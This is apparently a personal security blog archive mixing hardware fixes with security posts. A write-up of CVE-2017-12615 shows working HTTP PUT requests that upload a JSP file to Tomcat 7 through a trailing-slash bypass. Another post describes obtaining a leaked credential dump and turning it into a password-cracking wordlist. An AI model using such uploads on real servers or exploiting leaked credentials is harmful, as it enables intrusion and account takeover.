Pages

Saturday, May 15, 2021

Eth mining: How I lost and recovered 3.5K USD

What's up?

It's been a while. I know. Anyway, here's a story of 'what not to do', and a 'what you might want to try' when comes to PC fixing.

Tldr; I lost my eth private keystore to a wallet containing 0.85 ethereum cryptocurrency and managed to recover it through some dumb luck.

Background

I was mining eth back in 2017-2018 and in total got about 0.85 ETH for about $100 worth of electricity on a 1080 Ti that is primarily used for gaming. The card is still working well today :) Unfortunately, one mishap during transferring of PC components between two systems and I lost a SSD. I plugged in SATA power cable into the wrong 6-pin. Instead of a peripheral 6-pin, I inserted the cable into a GPU 6-pin. Needless to say, within a few seconds, I witnessed smoke and burnt plastic smell. After turning off the switch frantically, I ended up with a burnt 6-pin power port on my PSU (had to changed it), a burnt cable at both ends and a partially melted SATA power connector on the SSD. I didn't lose much. Only some games installation. Only 0.85 ETH since my private keystore is stored on the SSD, which back then was less than $200 USD. It's ok, not much gone. I probably won't need anything on that SSD. So I thought.

2021 - Soaring of Cryptocurrency

Now, 1 ETH is worth about $4K USD. 0.85 ETH roughly equates to $3K++ USD. "F**K ME!" I thought.

 
"F**K ME!"

So I carried this regret for a couple of months, and every now and then feel the stabbing pain on my wallet whenever someone mentions about cryptocurrency trading. But one day, I decided to fix it. Now it's no longer $180 - it's 3 grand. It deserves some attention.

ETH Wallet requirements

I created the ethereum wallet back in 2017 using GETH when I first started off mining. While I had the address and the passphrase, my private keystore was stored in that busted SSD. No keystore, no transacting rights. No transacting rights = No access to the stored ethereum. No access = no $. :( 

Search & Recovery

The moment I reached home, I started searching for it. First, I started with my cloud storage, hoping that my past self actually did back up the keystore JSON file. After a while, the only thing I saw was my wallet address. Sigh

So I decided to start searching for the SSD with a burnt connector. After a while, I found it was still attached to a metallic cage that is to be installed onto a PC case. Unscrewed it off the cage, and examined it a little, and I decided to see if I could clean it up a little. 

Cleaned up. But still busted.

The next step, I went online and started researching on replacing the SATA component. As much as I'm pretty comfortable with software and PC hardware, I have very little exposure to soldering. My kit was left in an office 3 jobs ago and I am not confident in glueing and soldering the component. I continued searching online for professionals to help, but fear the shops out there might access my data without my permission if they successfully repaired the SSD. I know, it was not full-disk encrypted but it was a gaming machine primarily, so back then I wasn't too worried. 

Finally, I had an idea. A sorta 'hail mary pass' idea that I can try before I head down to a shop or something. I read that the SATA power connector has multiple pins, and a lot of them are built for redundancy.

I interpreted it as every 3 pins to 1 "function"

"Two pins down. Maybe it's still connectable", I thought to myself. So knowing that I have a simple SATA/IDE to USD 2.0 adapter kit that can be used to connect non-external HDD/SSD to the PC via USB, I took it out and tried to connect a SATA power cable to the busted SSD connector. Wow, it fits.

As we know, even if it fits doesn't mean it will work. Worst case scenario, I'll just turn off the power if I smell burnt plastic or see any smoke. So I attached everything on the hard disk, and the 3-pin power plug to my power point, *fingers crossed* and turned on the power. Initially, there was nothing. But in about 30 seconds or so, I start to see Win 10 attempting to mount the SSD. NEAT! :) After about a minute, it finally mounted fully. I WAS ABLE TO ACCESS THE FILE SYSTEMS. I immediately bee-lined to the location where my keystore was stored and extracted it out.

"Power connector fits!" The simple temporarily external SSD set up.

Dumb luck but good luck - it worked! Extracting the private keystore for the eth wallet.

Moral of the story

Again, the cliche 'don't give up' or the taunting phrase 'try harder!' are parroted time after time. For this time, it kind of fits. If I didn't try, I wouldn't have recovered $3K++ worth of Ethereum. Was it dangerous? Yes. But I had a plan (well, pulling the power plug IS a plan). Was I lucky? Probably. Was it worth it? Well, no burnt plastic and extra 3 grand - definitely a 'HELL YEA'! 

True story.

Regards,

JS @breaktoprotect









Saturday, February 1, 2020

Fixing [SSL: CERTIFICATE_VERIFY_FAILED]

Scenario:
You are developing a Python app that needs to perform OAuth and talking to Google APIs. And you also want to intercept HTTP traffic to gain more understanding or debug your app, but faced the following terrible terrible messages:

Traceback (most recent call last):
  File "alt_google_sample.py", line 17, in <module>
    creds = tools.run_flow(flow, store, http=my_http)
  File "C:\python38\lib\site-packages\oauth2client\_helpers.py", line 133, in positional_wrapper
    return wrapped(*args, **kwargs)
  File "C:\python38\lib\site-packages\oauth2client\tools.py", line 243, in run_flow
    credential = flow.step2_exchange(code, http=http)
  File "C:\python38\lib\site-packages\oauth2client\_helpers.py", line 133, in positional_wrapper
    return wrapped(*args, **kwargs)
  File "C:\python38\lib\site-packages\oauth2client\client.py", line 2053, in step2_exchange
    resp, content = transport.request(
  File "C:\python38\lib\site-packages\oauth2client\transport.py", line 280, in request
    return http_callable(uri, method=method, body=body, headers=headers,
  File "C:\python38\lib\site-packages\httplib2\__init__.py", line 1982, in request
    (response, content) = self._request(
  File "C:\python38\lib\site-packages\httplib2\__init__.py", line 1650, in _request
    (response, content) = self._conn_request(
  File "C:\python38\lib\site-packages\httplib2\__init__.py", line 1557, in _conn_request
    conn.connect()
  File "C:\python38\lib\site-packages\httplib2\__init__.py", line 1326, in connect
    self.sock = self._context.wrap_socket(sock, server_hostname=self.host)
  File "C:\python38\lib\ssl.py", line 500, in wrap_socket
    return self.sslsocket_class._create(
  File "C:\python38\lib\ssl.py", line 1040, in _create
    self.do_handshake()
  File "C:\python38\lib\ssl.py", line 1309, in do_handshake
    self._sslobj.do_handshake()
ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:1108)

>:(

What's the issue?
If you're doing man-in-the-middle (MITM) for HTTP requests/responses, your TLS/SSL verification will certainly fail. Unfortunately, 'verify=False' does not work as the Google API client library uses httplib2 instead. However, all is not lost.

Remediation:
Import httplib2, instantiate a Http() object and use 'disable_ssl_certificate_validation=True' as the argument.

If you are using the Google Tutorial's sample code, this won't exactly work. :(


Solution #1: Disable the SSL verification altogether during testing.
...
my_http = httplib2.Http(disable_ssl_certificate_validation=True)

SCOPES = "https://www.googleapis.com/auth/calendar.readonly"
store = file.Storage('token.json')
creds = store.get()

if not creds or creds.invalid:
    flow = client.flow_from_clientsecrets('credentials.json'SCOPES)
    creds = tools.run_flow(flow, store, http=my_http)
    service = build('calendar''v3', http=creds.authorize(my_http))
...

Solution #2: Use self-signed certificate
Extract your intercepting software (e.g. Burpsuite) certificate, convert it to PEM format and then use the following code:
...
my_http = httplib2.Http(ca_certs='./burp.pem')

SCOPES = "https://www.googleapis.com/auth/calendar.readonly"
store = file.Storage('token.json')
creds = store.get()

if not creds or creds.invalid:
    flow = client.flow_from_clientsecrets('credentials.json'SCOPES)
    creds = tools.run_flow(flow, store, http=my_http)
    service = build('calendar''v3', http=creds.authorize(my_http))
...

For full code, please visit:
https://github.com/breaktoprotect/Useful-Code-Snippets/blob/master/googleapiclient_disable_ssl_verify.py

Screenshots of results - Yay - interception successful!

Sunday, December 1, 2019

Quick Tip: RT-AC85U to M1 (Huawei) internet connectivity issue

Hey,


If you're using an ASUS router and a Huawei ONT (e.g. from M1) and encounter difficulty connecting to the Internet, you may need to select non-automatic DNS settings and set DNS server to: 8.8.4.4


I had this issue specifically with the ASUS RT-AC85U and found this helpful. However, your ASUS router would probably have the same WAN configuration defaulting to automatic detecting DNS. Manually setting that might help even on a different model.

If you're not with M1 as an ISP, you might want to check out your ISP site to see if they require certain special settings to be done on your router.

Turn it off and turn it on again
Sometimes it might just be unstable behaviors of the router or the ONT and doing a power off-on might help. However, if you're here, it's likely you've already tried this as this advice is usually top on the list for any support.

Other problems
If for whatever reasons your ISP decided to whitelist the MAC address of the device connecting to their ONT, and you're swapping out an old router for a spanking new router, you may need to call up your ISP for support to whitelist it. This is very unlikely, but could potentially be the resolution to your issue.

Hope this helps.

JS

Saturday, September 23, 2017

The Case of CVE-2017-12615 Tomcat 7 PUT vulnerability

Exploit proof of concept:

You guys came for the code. So, click on my github repo link:


Warning: Don't die ROFL-ing as it's hilariously simple to exploit :D

Crux of the issue:

By design, if you try to upload a JSP file via the HTTP PUT method on the Tomcat server, it won't work. You can upload .html, .jpg, or any other extensions except .jsp, .jspx and the variants. 
For example, if you try:

Request:
PUT /myfile.jsp HTTP/1.1Host: 127.0.0.1:8080Connection: closeContent-Length: 85
<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

You will get an error :( such as the one shown in the below response.
Response:
HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 971Date: Sat, 23 Sep 2017 06:07:27 GMTConnection: close
...SNIPPED.<html><head><title>Apache Tomcat/7.0.79 - Error report</title><style><!--H1

However, you can bypass the extension check by appending a '/' behind the .jsp extension:

Request:
PUT /myfile.jsp/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Response:
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:45:50 GMT
Connection: close

And I got the clue from the Apache site with the patch diff indicated here: 


Pre-requisite:

1. PUT method is enabled through conf/web.xml
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>

2. No authentication enforced in the security-constraint set at the app's WEB-INF/web.xml
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>


References:


Ok that's all for now. 

JS out.

Sunday, May 7, 2017

ihavebeenpwned?

Background
Like some of the paranoid folks out there, I've signed myself up to haveibeenpwned.com to get informed via email whenever a site got hacked and my credentials are being leaked. A few days ago, I received an email saying that my credentials associated with my email address (user id) was leaked on seemingly a Russian site known as 'exploit.in'. I needed to know what password was leaked before I go on a mass change on all my accounts.


"Anti Public" combo list
It's said to be 458million credentials leaked. Yep, holy.
For more information: https://haveibeenpwned.com/PwnedWebsites#ExploitIn

Hunting the leaked password database
After perusing some forums, I managed to get my hands on the dump. It's about 10gb zipped up and 26gb unzipped. The files are separated with filenames starting from 1.txt to 111.txt, and the contents are in a format of [email address]:[cleartextpassword]. You get gmails, yahoos and even some .ru email addresses on it.
Holy batman it's 26gb of cleartext credentials which rivals the WPA list! On a SSD and a i5 3.2ghz, it still takes a few minutes to parse through the whole list. So back to the task "am I pwned?", I did a:
type * | findstr [partial my email address] > search_results.txt
After a couple of minutes, I found two email entries: a gmail and a yahoo. The yahoo has already expired and the gmail is a super old password that was since multiple password-changes ago. Phew for me. But still, quite a scare.

Charlie Mike: Investigate the passwords
Well, my curiosity goes beyond my own security status. I wanted to know what type of passwords were cracked and if they were able to bruteforce complex ones. So I went on performing some simple text processing. I'll do a post on this when I'm done. :)

Shiny New Dict
And of course, since it was verified to be a real credential dump, how can I ignore a super reliable word list? It came with a super easy format so the following commands helped cleaned it up:
cat exploit.in_2016.lst | sort | uniq > exploit.in_2016_uniq.lst
cat exploit.in | cut -d":" -f 2 > exploit-in.txt

LOL 50% CPU utilization on sort.exe
This is going to take a while. Don't wait up.
JS.


Sunday, June 12, 2016

My Thoughts On "no internet for the public sector"

What up.

Recently, Singapore government has decided to cut off the internet for public servants for security reasons. It was said that we are one of the prime targets. WHO ISN'T?
To read more, goto: http://www.bbc.com/news/world-asia-36476422

What are my thoughts on this?
*It was first written on a facebook comment in response to an annoying post with bad analogy. I wanted it to be a sharp and poignant comment but it ended up as a wall of text. So, I've decided to put it up just in case anyone tries to pull off another BS on how it was a good decision to cut off the internet.

No internet but haz email??? 
It's not pragmatic. Attackers will hit the systems which requires internet access and perform lateral movement from there onwards. Exposure is limited, but not eliminated. Moreover, emails are still active and IS a point of entry. AV is good at preventing known threats from entering but most malware are bespoke and mutate faster than an AV can keep up (e.g. it will be weeks before AV gets updated to prevent a APT malware. it will be months before systems get patched for zero-days). It is possible to worm through a network without requiring internet access. Yes, no internet = no beaconing back to C2 (command and control) server, but doesn't mean malware can't work. Malware can still worm through operating system vulnerabilities, performing lateral movement like a human attacker, and it's a matter of time a malware propagates and find exfiltration points to beacon or bring data out. So eliminating Internet keeps employees safe? To a certain point, but you need to truly air gap your systems i.e. no emails from the internet. But no one can truly work pure intranet email can they? Since they rely on AVs for email entry (and they better be), why don't they allow internet via proxy servers (e.g. all HTTP/HTTPS have to go through these machines for internet access.) Keeping email while eliminating internet is like stop eating ice cream to cut down calories but keep going nuts on oreo cookies thinking that they are not as sugary. This is a security architectural problem. Pulling out the WAN cable is at best naive. If government agencies want to be truly secure by this logic, PEN AND PAPER PLEASE.

A Short Note on Defense
So how to defend? Preventive and detective controls. Makes it hard and expensive for attackers to get in and maintain control. Preventive controls - the usual patch management, app whitelisting, host AV, exploit mitigation such as EMET, etc etc. But mistake not, for they will NOT prevent. They are there to be speed bumps and trip wires. E.g. if you got AV, attacker will need to evade and may avoid touching disk. This could mean powershell, dll injection, reflective dll loading, etc. If you are patched up timely, attackers need to spend $$ using their expensive zero-days. When it's used and found during forensics, it's no longer zero-day or as effective. If you got exploit mitigation, attackers need to make exploits that evades exploit mitigation. If you got logging in-place, attackers cannot perform active brute force methods as they may give off their position. If you got..ok you get what I mean. This goes the same with application whitelisting, configuration hardening and other forms of controls both endpoints and servers.

Detective controls - first harden every route except to leave one or two paths for attackers. Why do this? 1) Able to map out likely attack paths for easier detection; 2) Place more sensors on those paths for higher detection rate; 3) Decrease false positives thus allowing analysts to concentrate their effort in hunting down threat actors rather than responding to random events happening all over the network. Going further, implement Honeynet/honeypot within the network - placing systems within the organisation that no one would normally or ever access, which serves the purpose to trigger off alerts whenever a foreign threat actor logs in. This will trip up attackers when they are performing lateral movement. And yes, they WILL perform lateral movements. =) And there are more to talk about such as going beyond network and do endpoint threat detection or EDRs, basically. Hunt for IOCs instead of being event-driven. Yada yada...

The landscape has changed so much - you can no longer expect to keep attackers out. It's not about "if" but "when". Security professionals' job is to give a hard time for attackers to come in and when they do, be able to detect and triage before they do any significant damage (e.g. exfil data, service denial, make watering-hole points.). Most organisations doesn't even know that a threat actor is within their network until 6 months or until a "sale" on the darknet.

We need to do better than pulling out the ethernet cable. Don't you fucking giving up on us!

Disturbed,
J.S.

Saturday, April 2, 2016

WHY YOU NO DETECT MY SSD?!

*Warning: This has nothing to do with security. Read at your own risk! :D

Do you have issues detecting your new SSD on windows 10? You're able to detect the SSD properly on your BIOS but Windows 10's Disk Management shows up nothing? Perform 'Windows Memory Diagnostic'. Yes, it made no sense but it worked for me. After WMD is done with the 2 passes, boot in the OS and go to your Disk Management. You'll be prompt to initialize your shiny new SSD.
*This happens to my new samsung evo 850 250gb. 

Good luck, have fun! :)

Out,
JS.
smile emoticon